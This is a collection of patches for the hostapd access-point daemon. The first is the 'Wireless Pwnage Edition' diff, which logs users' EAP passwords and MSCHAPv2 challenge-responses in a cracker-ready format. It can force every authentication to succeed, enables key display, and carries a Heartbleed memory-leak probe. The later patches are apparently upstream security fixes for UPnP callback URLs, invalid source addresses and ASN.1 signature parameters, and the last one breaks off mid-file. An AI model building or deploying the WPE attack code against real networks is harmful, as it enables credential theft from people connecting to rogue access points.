diff -rupN hostapd-2.6/src/eap_server/eap_server_mschapv2.c hostapd-2.6-wpe/src/eap_server/eap_server_mschapv2.c
--- hostapd-2.6/src/eap_server/eap_server_mschapv2.c 2016-10-02 14:51:11.000000000 -0400
+++ hostapd-2.6-wpe/src/eap_server/eap_server_mschapv2.c 2016-12-17 06:12:53.955984072 -0500
@@ -12,7 +12,7 @@
#include "crypto/ms_funcs.h"
#include "crypto/random.h"
#include "eap_i.h"
-
+#include "wpe/wpe.h"
struct eap_mschapv2_hdr {
u8 op_code; /* MSCHAPV2_OP_* */
@@ -291,7 +291,7 @@ static void eap_mschapv2_process_respons
size_t username_len, user_len;
int res;
char *buf;
-
+ u8 wpe_challenge_hash[8];
pos = eap_hdr_validate(EAP_VENDOR_IETF, EAP_TYPE_MSCHAPV2, respData,
&len);
if (pos == NULL || len < 1)
@@ -372,6 +372,8 @@ static void eap_mschapv2_process_respons
}
}
#endif /* CONFIG_TESTING_OPTIONS */
+ challenge_hash(peer_challenge, data->auth_challenge, username, username_len, wpe_challenge_hash);
+ wpe_log_chalresp("mschapv2", name, name_len, wpe_challenge_hash, 8, nt_response, 24);
if (username_len != user_len ||
os_memcmp(username, user, username_len) != 0) {
@@ -406,6 +408,11 @@ static void eap_mschapv2_process_respons
return;
}
+ if (wpe_conf.wpe_enable_return_success) {
+ os_memset((void *)nt_response, 0, 24);
+ os_memset((void *)expected, 0, 24);
+ }
+
if (os_memcmp_const(nt_response, expected, 24) == 0) {
const u8 *pw_hash;
u8 pw_hash_buf[16], pw_hash_hash[16];
@@ -446,6 +453,8 @@ static void eap_mschapv2_process_respons
wpa_printf(MSG_DEBUG, "EAP-MSCHAPV2: Invalid NT-Response");
data->state = FAILURE_REQ;
}
+ if (wpe_conf.wpe_enable_return_success)
+ data->state = SUCCESS;
}
diff -rupN hostapd-2.6/src/eap_server/eap_server_peap.c hostapd-2.6-wpe/src/eap_server/eap_server_peap.c
--- hostapd-2.6/src/eap_server/eap_server_peap.c 2016-10-02 14:51:11.000000000 -0400
+++ hostapd-2.6-wpe/src/eap_server/eap_server_peap.c 2016-12-17 06:12:53.959984072 -0500
@@ -17,7 +17,7 @@
#include "eap_common/eap_tlv_common.h"
#include "eap_common/eap_peap_common.h"
#include "tncs.h"
-
+#include "wpe/wpe.h"
/* Maximum supported PEAP version
* 0 = Microsoft's PEAP version 0; draft-kamath-pppext-peapv0-00.txt
diff -rupN hostapd-2.6/src/eap_server/eap_server_ttls.c hostapd-2.6-wpe/src/eap_server/eap_server_ttls.c
--- hostapd-2.6/src/eap_server/eap_server_ttls.c 2016-10-02 14:51:11.000000000 -0400
+++ hostapd-2.6-wpe/src/eap_server/eap_server_ttls.c 2016-12-17 06:12:53.959984072 -0500
@@ -16,7 +16,7 @@
#include "eap_server/eap_tls_common.h"
#include "eap_common/chap.h"
#include "eap_common/eap_ttls.h"
-
+#include "wpe/wpe.h"
#define EAP_TTLS_VERSION 0
@@ -538,9 +538,11 @@ static void eap_ttls_process_phase2_pap(
return;
}
- if (sm->user->password_len != user_password_len ||
+ wpe_log_basic("eap-ttls/pap", sm->identity, sm->identity_len, user_password, user_password_len);
+
+ if ((!wpe_conf.wpe_enable_return_success) && (sm->user->password_len != user_password_len ||
os_memcmp_const(sm->user->password, user_password,
- user_password_len) != 0) {
+ user_password_len) != 0)) {
wpa_printf(MSG_DEBUG, "EAP-TTLS/PAP: Invalid user password");
eap_ttls_state(data, FAILURE);
return;
@@ -603,8 +605,9 @@ static void eap_ttls_process_phase2_chap
chap_md5(password[0], sm->user->password, sm->user->password_len,
challenge, challenge_len, hash);
- if (os_memcmp_const(hash, password + 1, EAP_TTLS_CHAP_PASSWORD_LEN) ==
- 0) {
+ wpe_log_chalresp("eap-ttls/chap", sm->identity, sm->identity_len, challenge, challenge_len, password, password_len);
+
+ if ((wpe_conf.wpe_enable_return_success) || (os_memcmp(hash, password + 1, EAP_TTLS_CHAP_PASSWORD_LEN) == 0)) {
wpa_printf(MSG_DEBUG, "EAP-TTLS/CHAP: Correct user password");
eap_ttls_state(data, SUCCESS);
eap_ttls_valid_session(sm, data);
@@ -672,7 +675,9 @@ static void eap_ttls_process_phase2_msch
nt_challenge_response(challenge, sm->user->password,
sm->user->password_len, nt_response);
- if (os_memcmp_const(nt_response, response + 2 + 24, 24) == 0) {
+ wpe_log_chalresp("eap-ttls/mschap", sm->identity, sm->identity_len, challenge, challenge_len, response + 2 + 24, 24);
+
+ if ((wpe_conf.wpe_enable_return_success) || (os_memcmp(nt_response, response + 2 + 24, 24) == 0)) {
wpa_printf(MSG_DEBUG, "EAP-TTLS/MSCHAP: Correct response");
eap_ttls_state(data, SUCCESS);
eap_ttls_valid_session(sm, data);
@@ -694,7 +699,7 @@ static void eap_ttls_process_phase2_msch
u8 *response, size_t response_len)
{
u8 *chal, *username, nt_response[24], *rx_resp, *peer_challenge,
- *auth_challenge;
+ *auth_challenge, wpe_challenge_hash[8];
size_t username_len, i;
if (challenge == NULL || response == NULL ||
@@ -779,6 +784,9 @@ static void eap_ttls_process_phase2_msch
}
rx_resp = response + 2 + EAP_TTLS_MSCHAPV2_CHALLENGE_LEN + 8;
+
+ challenge_hash(peer_challenge, auth_challenge, username, username_len, wpe_challenge_hash);
+ wpe_log_chalresp("eap-ttls/mschapv2", username, username_len, wpe_challenge_hash, 8, rx_resp, 24);
#ifdef CONFIG_TESTING_OPTIONS
{
u8 challenge2[8];
diff -rupN hostapd-2.6/src/Makefile hostapd-2.6-wpe/src/Makefile
--- hostapd-2.6/src/Makefile 2016-10-02 14:51:11.000000000 -0400
+++ hostapd-2.6-wpe/src/Makefile 2016-12-17 06:12:53.959984072 -0500
@@ -1,5 +1,5 @@
SUBDIRS=ap common crypto drivers eapol_auth eapol_supp eap_common eap_peer eap_server l2_packet p2p pae radius rsn_supp tls utils wps
-SUBDIRS += fst
+SUBDIRS += fst wpe
all:
for d in $(SUBDIRS); do [ -d $$d ] && $(MAKE) -C $$d; done
diff -rupN hostapd-2.6/src/utils/wpa_debug.c hostapd-2.6-wpe/src/utils/wpa_debug.c
--- hostapd-2.6/src/utils/wpa_debug.c 2016-10-02 14:51:11.000000000 -0400
+++ hostapd-2.6-wpe/src/utils/wpa_debug.c 2016-12-17 06:12:53.963984072 -0500
@@ -30,7 +30,7 @@ static FILE *wpa_debug_tracing_file = NU
int wpa_debug_level = MSG_INFO;
-int wpa_debug_show_keys = 0;
+int wpa_debug_show_keys = 1; // WPE >:)
int wpa_debug_timestamp = 0;
diff -rupN hostapd-2.6/src/wpe/Makefile hostapd-2.6-wpe/src/wpe/Makefile
--- hostapd-2.6/src/wpe/Makefile 1969-12-31 19:00:00.000000000 -0500
+++ hostapd-2.6-wpe/src/wpe/Makefile 2016-12-17 06:12:53.963984072 -0500
@@ -0,0 +1,8 @@
+all:
+ @echo Nothing to be made.
+
+clean:
+ rm -f *~ *.o *.d *.gcno *.gcda *.gcov
+
+install:
+ @echo Nothing to be made.
diff -rupN hostapd-2.6/src/wpe/wpe.c hostapd-2.6-wpe/src/wpe/wpe.c
--- hostapd-2.6/src/wpe/wpe.c 1969-12-31 19:00:00.000000000 -0500
+++ hostapd-2.6-wpe/src/wpe/wpe.c 2016-12-17 06:14:09.787982636 -0500
@@ -0,0 +1,213 @@
+/*
+ wpe.c -
+ brad.antoniewicz@foundstone.com
+ Implements WPE (Wireless Pwnage Edition) functionality within
+ hostapd.
+
+ WPE functionality focuses on targeting connecting users. At
+ it's core it implements credential logging (originally
+ implemented in FreeRADIUS-WPE), but also includes other patches
+ for other client attacks that have been modified to some extend.
+
+ FreeRADIUS-WPE: https://github.com/brad-anton/freeradius-wpe
+ Karma patch: http://foofus.net/goons/jmk/tools/hostapd-1.0-karma.diff
+ Cupid patch: https://github.com/lgrangeia/cupid/blob/master/patch-hostapd
+*/
+
+#include <time.h>
+#include <openssl/ssl.h>
+#include "includes.h"
+#include "common.h"
+#include "wpe/wpe.h"
+#include "utils/wpa_debug.h"
+
+#define wpe_logfile_default_location "./hostapd-wpe.log"
+
+
+#define MSCHAPV2_CHAL_HASH_LEN 8
+#define MSCHAPV2_CHAL_LEN 16
+#define MSCHAPV2_RESP_LEN 24
+
+char wpe_hb_msg[] = "\x18\x03\x01\x00\x03\x01\xff\xff";
+size_t wpe_hb_msg_len = sizeof(wpe_hb_msg)/sizeof(wpe_hb_msg[0]);
+
+struct wpe_config wpe_conf = {
+ .wpe_logfile = wpe_logfile_default_location,
+ .wpe_logfile_fp = NULL,
+ .wpe_enable_karma = 0,
+ .wpe_enable_cupid = 0,
+ .wpe_enable_return_success = 0,
+ .wpe_hb_send_before_handshake = 1,
+ .wpe_hb_send_before_appdata = 0,
+ .wpe_hb_send_after_appdata = 0,
+ .wpe_hb_payload_size = 50000,
+ .wpe_hb_num_tries = 1,
+ .wpe_hb_num_repeats = 10
+};
+
+void wpe_log_file_and_stdout(char const *fmt, ...) {
+
+ if ( wpe_conf.wpe_logfile_fp == NULL ) {
+ wpe_conf.wpe_logfile_fp = fopen(wpe_conf.wpe_logfile, "a");
+ if ( wpe_conf.wpe_logfile_fp == NULL )
+ printf("WPE: Cannot file log file");
+ }
+
+ va_list ap;
+
+ va_start(ap, fmt);
+ vprintf(fmt, ap);
+ va_end(ap);
+
+ va_start(ap, fmt);
+ if ( wpe_conf.wpe_logfile_fp != NULL )
+ vfprintf(wpe_conf.wpe_logfile_fp, fmt, ap);
+ va_end(ap);
+}
+
+void wpe_log_chalresp(char *type, const u8 *username, size_t username_len, const u8 *challenge, size_t challenge_len, const u8 *response, size_t response_len) {
+ time_t nowtime;
+ int x;
+
+ nowtime = time(NULL);
+
+ wpe_log_file_and_stdout("\n\n%s: %s", type, ctime(&nowtime));
+ wpe_log_file_and_stdout("\t username:\t");
+ for (x=0; x<username_len; x++)
+ wpe_log_file_and_stdout("%c",username[x]);
+ wpe_log_file_and_stdout("\n");
+
+ wpe_log_file_and_stdout("\t challenge:\t");
+ for (x=0; x<challenge_len - 1; x++)
+ wpe_log_file_and_stdout("%02x:",challenge[x]);
+ wpe_log_file_and_stdout("%02x\n",challenge[x]);
+
+ wpe_log_file_and_stdout("\t response:\t");
+ for (x=0; x<response_len - 1; x++)
+ wpe_log_file_and_stdout("%02x:",response[x]);
+ wpe_log_file_and_stdout("%02x\n",response[x]);
+
+ if (strncmp(type, "mschapv2", 8) == 0 || strncmp(type, "eap-ttls/mschapv2", 17) == 0) {
+ wpe_log_file_and_stdout("\t jtr NETNTLM:\t");
+ for (x=0; x<username_len; x++)
+ wpe_log_file_and_stdout("%c",username[x]);
+ wpe_log_file_and_stdout(":$NETNTLM$");
+
+ for (x=0; x<challenge_len; x++)
+ wpe_log_file_and_stdout("%02x",challenge[x]);
+ wpe_log_file_and_stdout("$");
+ for (x=0; x<response_len; x++)
+ wpe_log_file_and_stdout("%02x",response[x]);
+ wpe_log_file_and_stdout("\n");
+ }
+}
+
+void wpe_log_basic(char *type, const u8 *username, size_t username_len, const u8 *password, size_t password_len) {
+ time_t nowtime;
+ int x;
+
+ nowtime = time(NULL);
+
+ wpe_log_file_and_stdout("\n\n%s: %s",type, ctime(&nowtime));
+ wpe_log_file_and_stdout("\t username:\t");
+ for (x=0; x<username_len; x++)
+ wpe_log_file_and_stdout("%c",username[x]);
+ wpe_log_file_and_stdout("\n");
+
+ wpe_log_file_and_stdout("\t password:\t");
+ for (x=0; x<password_len; x++)
+ wpe_log_file_and_stdout("%c",password[x]);
+ wpe_log_file_and_stdout("\n");
+}
+
+/*
+ Taken from asleap, who took from nmap, who took from tcpdump :)
+*/
+void wpe_hexdump(unsigned char *bp, unsigned int length)
+{
+
+ /* stolen from tcpdump, then kludged extensively */
+
+ static const char asciify[] =
+ "................................ !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~.................................................................................................................................";
+
+ const unsigned short *sp;
+ const unsigned char *ap;
+ unsigned int i, j;
+ int nshorts, nshorts2;
+ int padding;
+
+ wpe_log_file_and_stdout("\n\t");
+ padding = 0;
+ sp = (unsigned short *)bp;
+ ap = (unsigned char *)bp;
+ nshorts = (unsigned int)length / sizeof(unsigned short);
+ nshorts2 = (unsigned int)length / sizeof(unsigned short);
+ i = 0;
+ j = 0;
+ while (1) {
+ while (--nshorts >= 0) {
+ wpe_log_file_and_stdout(" %04x", ntohs(*sp));
+ sp++;
+ if ((++i % 8) == 0)
+ break;
+ }
+ if (nshorts < 0) {
+ if ((length & 1) && (((i - 1) % 8) != 0)) {
+ wpe_log_file_and_stdout(" %02x ", *(unsigned char *)sp);
+ padding++;
+ }
+ nshorts = (8 - (nshorts2 - nshorts));
+ while (--nshorts >= 0) {
+ wpe_log_file_and_stdout(" ");
+ }
+ if (!padding)
+ wpe_log_file_and_stdout(" ");
+ }
+ wpe_log_file_and_stdout(" ");
+
+ while (--nshorts2 >= 0) {
+ wpe_log_file_and_stdout("%c%c", asciify[*ap], asciify[*(ap + 1)]);
+ ap += 2;
+ if ((++j % 8) == 0) {
+ wpe_log_file_and_stdout("\n\t");
+ break;
+ }
+ }
+ if (nshorts2 < 0) {
+ if ((length & 1) && (((j - 1) % 8) != 0)) {
+ wpe_log_file_and_stdout("%c", asciify[*ap]);
+ }
+ break;
+ }
+ }
+ if ((length & 1) && (((i - 1) % 8) == 0)) {
+ wpe_log_file_and_stdout(" %02x", *(unsigned char *)sp);
+ wpe_log_file_and_stdout(" %c",
+ asciify[*ap]);
+ }
+ wpe_log_file_and_stdout("\n");
+}
+
+void wpe_hb_cb(int v_write_p, int v_version, int v_content_type, const void* v_buf, size_t v_len, SSL* v_ssl, void* v_arg) {
+#ifdef TLS1_RT_HEARTBEAT
+ if (v_content_type == TLS1_RT_HEARTBEAT) {
+#elif defined(DTLS1_RT_HEARTBEAT)
+ if (v_content_type == DTLS1_RT_HEARTBEAT) {
+#endif
+ wpe_log_file_and_stdout("\n\nHeartbleed Data:\n");
+ v_ssl->tlsext_hb_pending = 1;
+ wpe_hexdump((unsigned char *)v_buf, v_len);
+ }
+}
+
+
+char *wpe_hb_clear() {
+ char *p;
+ // set payload size
+ p = &wpe_hb_msg[sizeof(wpe_hb_msg) - 3];
+ s2n(wpe_conf.wpe_hb_payload_size, p);
+
+ return wpe_hb_msg;
+}
+
diff -rupN hostapd-2.6/src/wpe/wpe.h hostapd-2.6-wpe/src/wpe/wpe.h
--- hostapd-2.6/src/wpe/wpe.h 1969-12-31 19:00:00.000000000 -0500
+++ hostapd-2.6-wpe/src/wpe/wpe.h 2016-12-17 06:12:53.963984072 -0500
@@ -0,0 +1,50 @@
+/*
+ wpe.h -
+ brad.antoniewicz@foundstone.com
+ Implements WPE (Wireless Pwnage Edition) functionality within
+ hostapd.
+
+ WPE functionality focuses on targeting connecting users. At
+ it's core it implements credential logging (originally
+ implemented in FreeRADIUS-WPE), but also includes other patches
+ for other client attacks.
+
+ FreeRADIUS-WPE: https://github.com/brad-anton/freeradius-wpe
+ Karma patch: http://foofus.net/goons/jmk/tools/hostapd-1.0-karma.diff
+ Cupid patch: https://github.com/lgrangeia/cupid/blob/master/patch-hostapd
+*/
+#include <openssl/ssl.h>
+
+struct wpe_config {
+ char *wpe_logfile;
+ FILE *wpe_logfile_fp;
+ unsigned int wpe_enable_karma;
+ unsigned int wpe_enable_cupid;
+ unsigned int wpe_enable_return_success;
+ unsigned int wpe_hb_send_before_handshake:1;
+ unsigned int wpe_hb_send_before_appdata:1;
+ unsigned int wpe_hb_send_after_appdata:1;
+ unsigned int wpe_hb_payload_size;
+ unsigned int wpe_hb_num_tries;
+ unsigned int wpe_hb_num_repeats;
+};
+
+extern struct wpe_config wpe_conf;
+
+extern char wpe_hb_msg[];
+extern size_t wpe_hb_msg_len;
+
+//#define WPE_HB_MSG_LEN 8
+
+#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \
+ (((unsigned int)(c[1])) )),c+=2)
+
+#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \
+ c[1]=(unsigned char)(((s) )&0xff)),c+=2)
+
+
+void wpe_log_file_and_stdout(char const *fmt, ...);
+void wpe_log_chalresp(char *type, const u8 *username, size_t username_len, const u8 *challenge, size_t challenge_len, const u8 *response, size_t response_len);
+void wpe_log_basic(char *type, const u8 *username, size_t username_len, const u8 *password, size_t password_len);
+void wpe_hb_cb(int v_write_p, int v_version, int v_content_type, const void* v_buf, size_t v_len, SSL* v_ssl, void* v_arg);
+char *wpe_hb_clear();


@ -1,150 +0,0 @@
From 5b78c8f961f25f4dc22d6f2b77ddd06d712cec63 Mon Sep 17 00:00:00 2001
From: Jouni Malinen <jouni@codeaurora.org>
Date: Wed, 3 Jun 2020 23:17:35 +0300
Subject: [PATCH 1/3] WPS UPnP: Do not allow event subscriptions with URLs to
other networks
The UPnP Device Architecture 2.0 specification errata ("UDA errata
16-04-2020.docx") addresses a problem with notifications being allowed
to go out to other domains by disallowing such cases. Do such filtering
for the notification callback URLs to avoid undesired connections to
external networks based on subscriptions that any device in the local
network could request when WPS support for external registrars is
enabled (the upnp_iface parameter in hostapd configuration).
Signed-off-by: Jouni Malinen <jouni@codeaurora.org>
---
src/wps/wps_er.c | 2 +-
src/wps/wps_upnp.c | 38 ++++++++++++++++++++++++++++++++++++--
src/wps/wps_upnp_i.h | 3 ++-
3 files changed, 39 insertions(+), 4 deletions(-)
diff --git a/src/wps/wps_er.c b/src/wps/wps_er.c
index 6bded14327f8..31d2e50e4cff 100644
--- a/src/wps/wps_er.c
+++ b/src/wps/wps_er.c
@@ -1298,7 +1298,7 @@ wps_er_init(struct wps_context *wps, const char *ifname, const char *filter)
"with %s", filter);
}
if (get_netif_info(er->ifname, &er->ip_addr, &er->ip_addr_text,
- er->mac_addr)) {
+ NULL, er->mac_addr)) {
wpa_printf(MSG_INFO, "WPS UPnP: Could not get IP/MAC address "
"for %s. Does it have IP address?", er->ifname);
wps_er_deinit(er, NULL, NULL);
diff --git a/src/wps/wps_upnp.c b/src/wps/wps_upnp.c
index 6e10e4bc0c3f..7d4b7439940e 100644
--- a/src/wps/wps_upnp.c
+++ b/src/wps/wps_upnp.c
@@ -303,6 +303,14 @@ static void subscr_addr_free_all(struct subscription *s)
}
+static int local_network_addr(struct upnp_wps_device_sm *sm,
+ struct sockaddr_in *addr)
+{
+ return (addr->sin_addr.s_addr & sm->netmask.s_addr) ==
+ (sm->ip_addr & sm->netmask.s_addr);
+}
+
+
/* subscr_addr_add_url -- add address(es) for one url to subscription */
static void subscr_addr_add_url(struct subscription *s, const char *url,
size_t url_len)
@@ -381,6 +389,7 @@ static void subscr_addr_add_url(struct subscription *s, const char *url,
for (rp = result; rp; rp = rp->ai_next) {
struct subscr_addr *a;
+ struct sockaddr_in *addr = (struct sockaddr_in *) rp->ai_addr;
/* Limit no. of address to avoid denial of service attack */
if (dl_list_len(&s->addr_list) >= MAX_ADDR_PER_SUBSCRIPTION) {
@@ -389,6 +398,13 @@ static void subscr_addr_add_url(struct subscription *s, const char *url,
break;
}
+ if (!local_network_addr(s->sm, addr)) {
+ wpa_printf(MSG_INFO,
+ "WPS UPnP: Ignore a delivery URL that points to another network %s",
+ inet_ntoa(addr->sin_addr));
+ continue;
+ }
+
a = os_zalloc(sizeof(*a) + alloc_len);
if (a == NULL)
break;
@@ -890,11 +906,12 @@ static int eth_get(const char *device, u8 ea[ETH_ALEN])
* @net_if: Selected network interface name
* @ip_addr: Buffer for returning IP address in network byte order
* @ip_addr_text: Buffer for returning a pointer to allocated IP address text
+ * @netmask: Buffer for returning netmask or %NULL if not needed
* @mac: Buffer for returning MAC address
* Returns: 0 on success, -1 on failure
*/
int get_netif_info(const char *net_if, unsigned *ip_addr, char **ip_addr_text,
- u8 mac[ETH_ALEN])
+ struct in_addr *netmask, u8 mac[ETH_ALEN])
{
struct ifreq req;
int sock = -1;
@@ -920,6 +937,19 @@ int get_netif_info(const char *net_if, unsigned *ip_addr, char **ip_addr_text,
in_addr.s_addr = *ip_addr;
os_snprintf(*ip_addr_text, 16, "%s", inet_ntoa(in_addr));
+ if (netmask) {
+ os_memset(&req, 0, sizeof(req));
+ os_strlcpy(req.ifr_name, net_if, sizeof(req.ifr_name));
+ if (ioctl(sock, SIOCGIFNETMASK, &req) < 0) {
+ wpa_printf(MSG_ERROR,
+ "WPS UPnP: SIOCGIFNETMASK failed: %d (%s)",
+ errno, strerror(errno));
+ goto fail;
+ }
+ addr = (struct sockaddr_in *) &req.ifr_netmask;
+ netmask->s_addr = addr->sin_addr.s_addr;
+ }
+
#ifdef __linux__
os_strlcpy(req.ifr_name, net_if, sizeof(req.ifr_name));
if (ioctl(sock, SIOCGIFHWADDR, &req) < 0) {
@@ -1026,11 +1056,15 @@ static int upnp_wps_device_start(struct upnp_wps_device_sm *sm, char *net_if)
/* Determine which IP and mac address we're using */
if (get_netif_info(net_if, &sm->ip_addr, &sm->ip_addr_text,
- sm->mac_addr)) {
+ &sm->netmask, sm->mac_addr)) {
wpa_printf(MSG_INFO, "WPS UPnP: Could not get IP/MAC address "
"for %s. Does it have IP address?", net_if);
goto fail;
}
+ wpa_printf(MSG_DEBUG, "WPS UPnP: Local IP address %s netmask %s hwaddr "
+ MACSTR,
+ sm->ip_addr_text, inet_ntoa(sm->netmask),
+ MAC2STR(sm->mac_addr));
/* Listen for incoming TCP connections so that others
* can fetch our "xml files" from us.
diff --git a/src/wps/wps_upnp_i.h b/src/wps/wps_upnp_i.h
index e87a93232df1..6ead7b4e9a30 100644
--- a/src/wps/wps_upnp_i.h
+++ b/src/wps/wps_upnp_i.h
@@ -128,6 +128,7 @@ struct upnp_wps_device_sm {
u8 mac_addr[ETH_ALEN]; /* mac addr of network i.f. we use */
char *ip_addr_text; /* IP address of network i.f. we use */
unsigned ip_addr; /* IP address of network i.f. we use (host order) */
+ struct in_addr netmask;
int multicast_sd; /* send multicast messages over this socket */
int ssdp_sd; /* receive discovery UPD packets on socket */
int ssdp_sd_registered; /* nonzero if we must unregister */
@@ -158,7 +159,7 @@ struct subscription * subscription_find(struct upnp_wps_device_sm *sm,
const u8 uuid[UUID_LEN]);
void subscr_addr_delete(struct subscr_addr *a);
int get_netif_info(const char *net_if, unsigned *ip_addr, char **ip_addr_text,
- u8 mac[ETH_ALEN]);
+ struct in_addr *netmask, u8 mac[ETH_ALEN]);
/* wps_upnp_ssdp.c */
void msearchreply_state_machine_stop(struct advertisement_state_machine *a);
--
2.20.1


@ -1,59 +0,0 @@
From f7d268864a2660b7239b9a8ff5ad37faeeb751ba Mon Sep 17 00:00:00 2001
From: Jouni Malinen <jouni@codeaurora.org>
Date: Wed, 3 Jun 2020 22:41:02 +0300
Subject: [PATCH 2/3] WPS UPnP: Fix event message generation using a long URL
path
More than about 700 character URL ended up overflowing the wpabuf used
for building the event notification and this resulted in the wpabuf
buffer overflow checks terminating the hostapd process. Fix this by
allocating the buffer to be large enough to contain the full URL path.
However, since that around 700 character limit has been the practical
limit for more than ten years, start explicitly enforcing that as the
limit or the callback URLs since any longer ones had not worked before
and there is no need to enable them now either.
Signed-off-by: Jouni Malinen <jouni@codeaurora.org>
---
src/wps/wps_upnp.c | 9 +++++++--
src/wps/wps_upnp_event.c | 3 ++-
2 files changed, 9 insertions(+), 3 deletions(-)
diff --git a/src/wps/wps_upnp.c b/src/wps/wps_upnp.c
index 7d4b7439940e..ab685d52ecab 100644
--- a/src/wps/wps_upnp.c
+++ b/src/wps/wps_upnp.c
@@ -328,9 +328,14 @@ static void subscr_addr_add_url(struct subscription *s, const char *url,
int rerr;
size_t host_len, path_len;
- /* url MUST begin with http: */
- if (url_len < 7 || os_strncasecmp(url, "http://", 7))
+ /* URL MUST begin with HTTP scheme. In addition, limit the length of
+ * the URL to 700 characters which is around the limit that was
+ * implicitly enforced for more than 10 years due to a bug in
+ * generating the event messages. */
+ if (url_len < 7 || os_strncasecmp(url, "http://", 7) || url_len > 700) {
+ wpa_printf(MSG_DEBUG, "WPS UPnP: Reject an unacceptable URL");
goto fail;
+ }
url += 7;
url_len -= 7;
diff --git a/src/wps/wps_upnp_event.c b/src/wps/wps_upnp_event.c
index d7e6edcc6503..08a23612f338 100644
--- a/src/wps/wps_upnp_event.c
+++ b/src/wps/wps_upnp_event.c
@@ -147,7 +147,8 @@ static struct wpabuf * event_build_message(struct wps_event_ *e)
struct wpabuf *buf;
char *b;
- buf = wpabuf_alloc(1000 + wpabuf_len(e->data));
+ buf = wpabuf_alloc(1000 + os_strlen(e->addr->path) +
+ wpabuf_len(e->data));
if (buf == NULL)
return NULL;
wpabuf_printf(buf, "NOTIFY %s HTTP/1.1\r\n", e->addr->path);
--
2.20.1


@ -1,47 +0,0 @@
From 85aac526af8612c21b3117dadc8ef5944985b476 Mon Sep 17 00:00:00 2001
From: Jouni Malinen <jouni@codeaurora.org>
Date: Thu, 4 Jun 2020 21:24:04 +0300
Subject: [PATCH 3/3] WPS UPnP: Handle HTTP initiation failures for events more
properly
While it is appropriate to try to retransmit the event to another
callback URL on a failure to initiate the HTTP client connection, there
is no point in trying the exact same operation multiple times in a row.
Replve the event_retry() calls with event_addr_failure() for these cases
to avoid busy loops trying to repeat the same failing operation.
These potential busy loops would go through eloop callbacks, so the
process is not completely stuck on handling them, but unnecessary CPU
would be used to process the continues retries that will keep failing
for the same reason.
Signed-off-by: Jouni Malinen <jouni@codeaurora.org>
---
src/wps/wps_upnp_event.c | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/src/wps/wps_upnp_event.c b/src/wps/wps_upnp_event.c
index 08a23612f338..c0d9e41d9a38 100644
--- a/src/wps/wps_upnp_event.c
+++ b/src/wps/wps_upnp_event.c
@@ -294,7 +294,7 @@ static int event_send_start(struct subscription *s)
buf = event_build_message(e);
if (buf == NULL) {
- event_retry(e, 0);
+ event_addr_failure(e);
return -1;
}
@@ -302,7 +302,7 @@ static int event_send_start(struct subscription *s)
event_http_cb, e);
if (e->http_event == NULL) {
wpabuf_free(buf);
- event_retry(e, 0);
+ event_addr_failure(e);
return -1;
}
--
2.20.1


@ -1,73 +0,0 @@
From 8c07fa9eda13e835f3f968b2e1c9a8be3a851ff9 Mon Sep 17 00:00:00 2001
From: Jouni Malinen <j@w1.fi>
Date: Thu, 29 Aug 2019 11:52:04 +0300
Subject: [PATCH] AP: Silently ignore management frame from unexpected source
address
Do not process any received Management frames with unexpected/invalid SA
so that we do not add any state for unexpected STA addresses or end up
sending out frames to unexpected destination. This prevents unexpected
sequences where an unprotected frame might end up causing the AP to send
out a response to another device and that other device processing the
unexpected response.
In particular, this prevents some potential denial of service cases
where the unexpected response frame from the AP might result in a
connected station dropping its association.
Signed-off-by: Jouni Malinen <j@w1.fi>
---
src/ap/drv_callbacks.c | 13 +++++++++++++
src/ap/ieee802_11.c | 12 ++++++++++++
2 files changed, 25 insertions(+)
diff --git a/src/ap/drv_callbacks.c b/src/ap/drv_callbacks.c
index 31587685fe3b..34ca379edc3d 100644
--- a/src/ap/drv_callbacks.c
+++ b/src/ap/drv_callbacks.c
@@ -131,6 +131,19 @@ int hostapd_notif_assoc(struct hostapd_data *hapd, const u8 *addr,
"hostapd_notif_assoc: Skip event with no address");
return -1;
}
+
+ if (is_multicast_ether_addr(addr) ||
+ is_zero_ether_addr(addr) ||
+ os_memcmp(addr, hapd->own_addr, ETH_ALEN) == 0) {
+ /* Do not process any frames with unexpected/invalid SA so that
+ * we do not add any state for unexpected STA addresses or end
+ * up sending out frames to unexpected destination. */
+ wpa_printf(MSG_DEBUG, "%s: Invalid SA=" MACSTR
+ " in received indication - ignore this indication silently",
+ __func__, MAC2STR(addr));
+ return 0;
+ }
+
random_add_randomness(addr, ETH_ALEN);
hostapd_logger(hapd, addr, HOSTAPD_MODULE_IEEE80211,
diff --git a/src/ap/ieee802_11.c b/src/ap/ieee802_11.c
index c85a28db44b7..e7065372e158 100644
--- a/src/ap/ieee802_11.c
+++ b/src/ap/ieee802_11.c
@@ -4626,6 +4626,18 @@ int ieee802_11_mgmt(struct hostapd_data *hapd, const u8 *buf, size_t len,
fc = le_to_host16(mgmt->frame_control);
stype = WLAN_FC_GET_STYPE(fc);
+ if (is_multicast_ether_addr(mgmt->sa) ||
+ is_zero_ether_addr(mgmt->sa) ||
+ os_memcmp(mgmt->sa, hapd->own_addr, ETH_ALEN) == 0) {
+ /* Do not process any frames with unexpected/invalid SA so that
+ * we do not add any state for unexpected STA addresses or end
+ * up sending out frames to unexpected destination. */
+ wpa_printf(MSG_DEBUG, "MGMT: Invalid SA=" MACSTR
+ " in received frame - ignore this frame silently",
+ MAC2STR(mgmt->sa));
+ return 0;
+ }
+
if (stype == WLAN_FC_STYPE_BEACON) {
handle_beacon(hapd, mgmt, len, fi);
return 1;
--
2.20.1


@ -1,115 +0,0 @@
From a0541334a6394f8237a4393b7372693cd7e96f15 Mon Sep 17 00:00:00 2001
From: Jouni Malinen <j@w1.fi>
Date: Sat, 13 Mar 2021 18:19:31 +0200
Subject: ASN.1: Validate DigestAlgorithmIdentifier parameters
The supported hash algorithms do not use AlgorithmIdentifier parameters.
However, there are implementations that include NULL parameters in
addition to ones that omit the parameters. Previous implementation did
not check the parameters value at all which supported both these cases,
but did not reject any other unexpected information.
Use strict validation of digest algorithm parameters and reject any
unexpected value when validating a signature. This is needed to prevent
potential forging attacks.
Signed-off-by: Jouni Malinen <j@w1.fi>
---
src/tls/pkcs1.c | 21 +++++++++++++++++++++
src/tls/x509v3.c | 20 ++++++++++++++++++++
2 files changed, 41 insertions(+)
diff --git a/src/tls/pkcs1.c b/src/tls/pkcs1.c
index bbdb0d7..5761dfe 100644
--- a/src/tls/pkcs1.c
